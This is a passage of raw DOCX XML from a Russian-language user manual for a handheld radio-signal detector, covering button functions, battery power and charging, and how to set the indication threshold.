                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>порога инди</w:t>
            </w:r>
            <w:r w:rsidRPr="004A52FB">
              <w:rPr>
                <w:rStyle w:val="21"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:softHyphen/>
              <w:t>кации уровней в режиме ПОИСК</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2066" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="004A52FB">
              <w:rPr>
                <w:rStyle w:val="21"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Возврат в предыдущий уровень МЕНЮ</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="004A52FB">
              <w:rPr>
                <w:rStyle w:val="21"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Перемещение между банками событий в режиме ПРОСМОТР ПРОТОКОЛА, выход из ПРОСМОТРА ПРОТОКОЛА</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="004A52FB">
              <w:rPr>
                <w:rStyle w:val="21"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Ручной выбор диапазона вертикальной развертки или обнуление значения маркера в режиме ОСЦИЛЛОГРАФ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="283"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="88" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="004A52FB">
              <w:rPr>
                <w:rStyle w:val="Arial4pt"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>SENS</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="004A52FB">
              <w:rPr>
                <w:rStyle w:val="Arial4pt"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>EXIT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1948" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="004A52FB">
              <w:rPr>
                <w:rStyle w:val="21"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Установка чувствительности шкал индикации</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2066" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="004A52FB">
              <w:rPr>
                <w:rStyle w:val="21"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Выход из МЕНЮ и режима ОСЦИЛЛОГРАФ.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="004A52FB">
              <w:rPr>
                <w:rStyle w:val="21"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Выход из маркерных измерений в режиме ОСЦИЛЛОГРАФ.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="004A52FB">
              <w:rPr>
                <w:rStyle w:val="21"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Возврат в режим ПОИСК или МОНИТОРИНГ в режиме ПРОСМОТР ПРОТОКОЛА</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="283"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="88" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="004A52FB">
              <w:rPr>
                <w:rStyle w:val="BookmanOldStyle105pt-1pt"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>»r</w:t>
            </w:r>
            <w:r w:rsidRPr="004A52FB">
              <w:rPr>
                <w:rStyle w:val="Arial4pt"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="subscript"/>
              </w:rPr>
              <w:t>r</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1948" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="004A52FB">
              <w:rPr>
                <w:rStyle w:val="21"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Регулировка уровня громкости</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2066" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="004A52FB">
              <w:rPr>
                <w:rStyle w:val="21"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Перемещение по пунктам МЕНЮ.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="004A52FB">
              <w:rPr>
                <w:rStyle w:val="21"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Перемещение между событиями в режиме ПРОСМОТР ПРОТОКОЛА Выбор диапазона горизонтальной развертки или перемещение маркера в режиме ОСЦИЛЛОГРАФ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="283"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="88" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="004A52FB">
              <w:rPr>
                <w:rStyle w:val="Arial4pt"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>«u</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1948" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="004A52FB">
              <w:rPr>
                <w:rStyle w:val="21"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Вход в МЕНЮ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2066" w:type="pct"/>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4A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="004A52FB">
              <w:rPr>
                <w:rStyle w:val="21"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Подтверждение выбора.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="004A52FB">
              <w:rPr>
                <w:rStyle w:val="21"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Вход в маркерные измерения в режиме ОСЦИЛЛОГРАФ.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>6.2</w:t>
      </w:r>
      <w:r w:rsidRPr="004A52FB">
        <w:tab/>
        <w:t>ПИТАНИЕ ИЗДЕЛИЯ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>Питание ST 1 1 0 осуществляется от:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidRPr="004A52FB">
        <w:tab/>
        <w:t xml:space="preserve"> от встроенного Li-Pol аккумулятора;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidRPr="004A52FB">
        <w:tab/>
        <w:t xml:space="preserve"> блока питания/ зарядного устройства;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidRPr="004A52FB">
        <w:tab/>
        <w:t xml:space="preserve"> USB порта PC.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>При работе от встроенной аккумуляторной батареи ее состояние отображает пиктограмма С| |. Полностью заштрихованное изображение соответствует полностью заряженной аккумуляторной батареи. Полностью обесцвеченная и мигающая пиктограмма, обозначает, соответственно, состояние батареи близкое к полному разряду.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>При полном разряде аккумуляторной батареи на экране, на десять секунд, появится надпись «АККУМУЛЯТОР РАЗРЯЖЕН».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>Время работы со свежезаряженной аккумуляторной батареей составляет около 5 часов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>При использовании блока питания/зарядного устройства или работы через USB порт пиктограмма аккумуляторной батареи сменится на пиктограмму</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>6.2.1</w:t>
      </w:r>
      <w:r w:rsidRPr="004A52FB">
        <w:tab/>
        <w:t>Заряд аккумулятора</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>Переведите выключатель питания в положение «ON».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>Подключите к разъему USB основного блока зарядное устройство/блок питания или USB порт PC.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>Процессу заряда, при выключении изделии с использованием кнопки PWR/MODE, первые десять секунд, будет соответствовать надпись «ЗАРЯД АККУМУЛЯТОРА» и, соответственно, «АККУМУЛЯТОР ЗАРЯЖЕН» по окончании процесса заряда.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>При включенном изделии, процессу заряда соответствуют бегущие сегменты пиктограммы MX хt окончанию заряда — полностью заштрихованная пиктограмма.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>Время полного заряда от зарядного устройства/блока питания составляет порядка 2.5 ч, от USB порта PC — около 8 часов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>6.3</w:t>
      </w:r>
      <w:r w:rsidRPr="004A52FB">
        <w:tab/>
        <w:t>ПОДГОТОВКА К РАБОТЕ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>Подсоедините ВЧ антенну к основному блоку.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>Включите изделие.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r>
        <w:t xml:space="preserve">6.4.2. </w:t>
      </w:r>
      <w:r w:rsidRPr="004A52FB">
        <w:t>Управление</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>Установка порога индикации относительно текущего уровня радиосигналов (вычитание фона) осуществляется при кратков</w:t>
      </w:r>
      <w:r>
        <w:t>ременном нажатии на кнопку</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"> « |</w:t>
      </w:r>
      <w:r w:rsidRPr="004A52FB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="0049237E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2613660" cy="2148840"/>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660" cy="2148840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00B45DB0" w:rsidRPr="00C97CAF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">В </w:t>
      </w:r>
      <w:r w:rsidRPr="004A52FB">
        <w:t>этот</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004A52FB">
        <w:t>момент кратковременно</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004A52FB">
        <w:t>появляется надпись «НОЛЬ» (поз. 4 рис.2) и происходит обнуление индикаторов с отображением численного значения в поз. 10.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004A52FB">
        <w:t>Численное значение текущего уровня сигналов относительно установленного нулевого порога будет отображаться в поз. 5.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>После каждой установки «нулевого порога» масштаб индикаторов меняется по остаточному принципу, например, если абсолютное значение нулевого уровня равно 24 dB, то шкала индикации становится линейно распределенной между 24 и 55 dВ (приблизительно 1 dB на сегмент), если абсолютное значение нулевого уровня равно 12d В, то шкала индикации становится линейно распределенной между 1 2 и 60 dB (1.5 dB на сегмент) и т.д.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251622912" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1123950</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1033780</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3713480" cy="3368675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="209" name="Рисунок 2" descr="Описание: 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ag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480" cy="336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4A52FB">
        <w:t>Отмена установки порога индикации с обнулением показаний в позиции 10 производится нажатием на кнопку во время индикации Г¥Н «НОЛЬ» в поз. 4 рис.2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>Установка чувствительности шкал индикации производится кратковременным</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97CAF">
        <w:t>последовательны</w:t>
      </w:r>
      <w:r>
        <w:t>м нажатием на кнопку</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>При</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>этом</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">в поз.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97CAF">
        <w:t>рис.2 индицируются выбранное значение</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
